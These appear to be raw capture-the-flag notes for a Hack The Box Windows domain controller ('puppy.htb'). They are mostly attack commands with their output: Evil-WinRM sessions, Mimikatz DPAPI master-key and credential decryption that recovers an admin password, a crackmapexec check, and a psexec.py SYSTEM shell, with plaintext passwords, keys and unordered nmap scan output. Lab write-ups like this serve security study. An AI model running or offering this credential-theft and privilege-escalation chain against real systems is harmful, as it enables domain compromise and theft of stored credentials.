Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> whoami
puppy\steph.cooper
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> hostname
DC
steph.cooper SHELL !
steph.cooper -> steph.cooper_adm:
donpapi collect -t 10.129.113.196 -d puppy.htb -u steph.cooper -p 'ChefSteph2025!' #NOPE
Get-ChildItem C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\ -Force
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials> Get-ChildItem C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\ -Force
Directory: C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 8:14 AM 11068 DFBE70A7E5CC19A398EBF1B96859CE5D
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials>
Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::dpapi" "exit"'
#NOPE, no master key found in sekurlsa::dpapi.
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cred /in:C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D" "exit"'
mimikatz(powershell) # dpapi::cred /in:C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {556a2412-1275-4ccf-b721-e6a0b4f90407}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000030 - 48
szDescription : Local Credential Data
[SNIP]
556a2412-1275-4ccf-b721-e6a0b4f90407 - Master Key
Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft> cd Protect
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect> dir
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 2/23/2025 2:36 PM S-1-5-21-1487982659-1829050783-2281216199-1107
Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect> Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:40 AM 740 556a2412-1275-4ccf-b721-e6a0b4f90407
-a-hs- 2/23/2025 2:36 PM 24 Preferred
556a2412-1275-4ccf-b721-e6a0b4f90407 = Master Key.
Works !:
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407" "/sid:S-1-5-21-1487982659-1829050783-2281216199-1107" "/password:ChefSteph2025!" "/protected" "exit""'
[masterkey] with password: ChefSteph2025! (protected user)
key : d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
sha1: 3c3cf2061dd9d45000e9e6b49e37c7016e98e701
[backupkey] without DPAPI_SYSTEM:
key : 1a943a912fa315c7f9eced48870b613d9e75b467d13d618bbad9262ef3f2c567
sha1: 469928729f9405d7ba46a22de53071b2e1d81fb9
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cred /in:C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" "exit"'
#EMPTY = No credential discovered there.
Time to use other Microsoft Credentials in Roaming Folder:
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> ls -force
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:54 AM 414 C8D69EBE9A43E9DEBF6B5FBD48B521B9
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cred /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9" "exit"'
mimikatz(powershell) # dpapi::cred /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {556a2412-1275-4ccf-b721-e6a0b4f90407}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 0000003a - 58
szDescription : Enterprise Credential Data
Same Master Key so we gonna use the decrypt master key as usual.
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cred /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" "exit"'
[SNIP]
Decrypting Credential:
* masterkey : d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000c8 - 200
credUnk0 : 00000000 - 0
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 3/8/2025 3:54:29 PM
unkFlagsOrSize : 00000030 - 48
Persist : 00000003 - 3 - enterprise
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:target=PUPPY.HTB
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : steph.cooper_adm
CredentialBlob : FivethChipOnItsWay2025!
Attributes : 0
steph.cooper_adm credential discovered !
steph.cooper_adm:FivethChipOnItsWay2025!
crackmapexec smb 10.129.113.196 -u steph.cooper_adm -p FivethChipOnItsWay2025!
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.129.113.196 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.129.113.196 445 DC [+] PUPPY.HTB\steph.cooper_adm:FivethChipOnItsWay2025! (Pwn3d!)
sudo rlwrap psexec.py 'puppy.htb/steph.cooper_adm:FivethChipOnItsWay2025!@10.129.113.196'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.113.196.....
[*] Found writable share ADMIN$
[*] Uploading file dxtsuKPY.exe
[*] Opening SVCManager on 10.129.113.196.....
[*] Creating service PVaB on 10.129.113.196.....
[*] Starting service PVaB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.3453]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
DC
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 311D-593C
Directory of C:\Users\Administrator\Desktop
05/12/2025 07:34 PM <DIR> .
03/11/2025 09:14 PM <DIR> ..
05/27/2025 04:31 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,744,788,992 bytes free
C:\Users\Administrator\Desktop> type root.txt
REDIRECTED
ROOT.TXT: REDIRECTED
Don't Work !:
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"" "/rpc" "exit"'
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"" "/sid:S-1-5-21-1487982659-1829050783-2281216199-1107" "/password:ChefSteph2025!" "/protected" "exit"'
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"" "/sid:S-1-5-21-1487982659-1829050783-2281216199-1107" "/password:ChefSteph2025!" "/protected" "exit"'
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107"" "/rpc" "exit"'
Invoke-Mimikatz -Command '""privilege::debug"" ""token::elevate"" ""dpapi::masterkey /in:""C:\Users\epugh\AppData\Roaming\Microsoft\Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\7dc6a492-36e2-4c2d-be66-ba29d263dda2"" ""/sid:S-1-5-21-1396373213-2872852198-2033860859-1151"" ""/password:Sarah2017"" ""/protected"" ""exit""'
9389/tcp open mc-nmf .NET Message Framing (Active Directory Web Services - adws)
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49685/tcp open msrpc Microsoft Windows RPC
55868/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-23T00:32:38
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: 6h59m55s
----------------------Starting UDP Scan------------------------
PORT STATE SERVICE
53/udp open domain
111/udp open rpcbind
123/udp open ntp
389/udp open ldap
2049/udp open nfs
PORT STATE SERVICE VERSION
53/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
111/udp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
123/udp open ntp NTP v3
389/udp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
2049/udp open mountd 1-3 (RPC #100005)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
